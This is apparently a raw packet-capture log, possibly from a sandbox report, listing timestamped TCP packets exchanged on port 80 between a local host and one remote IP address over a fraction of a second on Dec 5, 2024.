                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.070802927 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.070842028 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.071737051 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.071788073 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.072041035 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.072083950 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.072618961 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.072669029 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.072715998 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.072751045 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.073718071 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.073776007 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.073873997 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.073920965 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.074516058 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.074568033 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.074790001 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.075670004 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.075685978 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.075716019 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.075741053 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.076384068 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.077090979 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.077136040 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.077275991 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.077290058 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.077317953 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.077342987 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.078178883 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.078530073 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.078573942 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.079086065 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.079334974 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.079381943 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.080043077 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.080091000 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.080390930 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.080451012 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.081212044 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.081262112 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.081486940 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.081531048 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.081901073 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.081947088 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.082017899 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.082861900 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.082904100 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.083950996 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.083977938 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.083990097 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.083992958 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.084027052 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.084805965 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.085763931 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.085777998 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.085820913 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.085854053 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.085889101 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.085949898 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.086540937 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.087740898 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.087800026 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.087812901 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.087826014 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.087837934 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.087882042 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.087882042 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.088469982 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.088510990 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.088726997 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.088768005 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.089405060 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.089448929 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.089844942 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.089884043 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.090317965 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.090365887 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.090692997 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.090738058 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.091355085 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.091717005 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.091768980 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.092264891 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.092297077 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.092308998 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.092350006 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.093189955 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.093209028 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.093235970 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.093256950 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.093935013 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.094412088 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.237529993 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.237739086 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.237865925 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.237957001 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.237996101 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.238090038 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.238126040 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.238903046 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.238950014 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.239783049 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.239995956 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.240010023 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.240046024 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.240062952 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.241208076 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.241919041 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.241969109 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.241986036 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.241997957 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.242019892 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.242042065 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.242794991 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.242831945 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.243374109 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.243431091 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.243796110 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.243993044 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.244049072 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.244760990 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.244822979 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.245284081 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.245332003 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.245496035 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.245517015 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.245529890 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.245548010 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.246274948 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.246300936 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.246342897 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.247200012 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.247246027 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.247647047 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.247689009 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.248155117 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.248202085 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.248243093 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.249152899 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.249208927 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.249871969 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.249914885 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.249985933 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.249998093 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.250021935 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.250039101 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.250880957 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.250958920 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.251007080 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.251873016 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.251996994 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.252049923 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.252744913 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.252796888 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.253458977 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.253509045 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.253725052 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.253745079 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.253767014 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.253778934 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.254627943 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.254678965 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.255431890 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.255477905 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.255547047 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.255620956 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.255645037 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.255681038 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.256470919 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.256666899 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.256731033 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.257400036 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.257442951 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.257687092 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.257767916 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.258358002 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.258399963 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.258727074 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.258764982 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.259263992 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.259303093 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.259337902 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.259380102 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.260255098 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.260643959 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.260699987 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.261145115 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.261202097 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.261847019 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.261898994 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.262080908 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.262094021 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.262119055 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.262134075 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.263060093 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.263734102 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.264014006 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.264034986 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.264056921 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.264074087 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.264333010 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.264370918 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.265002966 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.265014887 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.265055895 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.265820980 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.265881062 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.266093969 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.266136885 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.266834974 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.266846895 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.266875029 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.266931057 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.267632008 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.267723083 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.267855883 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.267918110 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.268620014 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.268660069 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.268697977 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.268734932 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.269546986 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.269582987 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.269860029 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.269895077 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.270417929 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.270456076 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.270853043 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.270891905 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.271378040 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.271414995 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.271580935 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.271625042 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.272304058 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.272663116 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.272720098 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.273241043 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.273281097 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.273591995 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.273631096 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.274183035 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.274220943 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.274378061 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.274410963 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.275068998 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.275106907 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.275192022 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.275238037 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.276014090 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.276884079 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.276949883 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.276976109 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.276988983 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.277012110 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.277036905 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.277961016 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.277973890 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.278021097 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.278800011 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.278842926 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.278959990 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.278999090 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.279829979 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.279994965 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.280047894 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.280679941 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:17.280725002 CET4979380192.168.2.11185.215.113.84
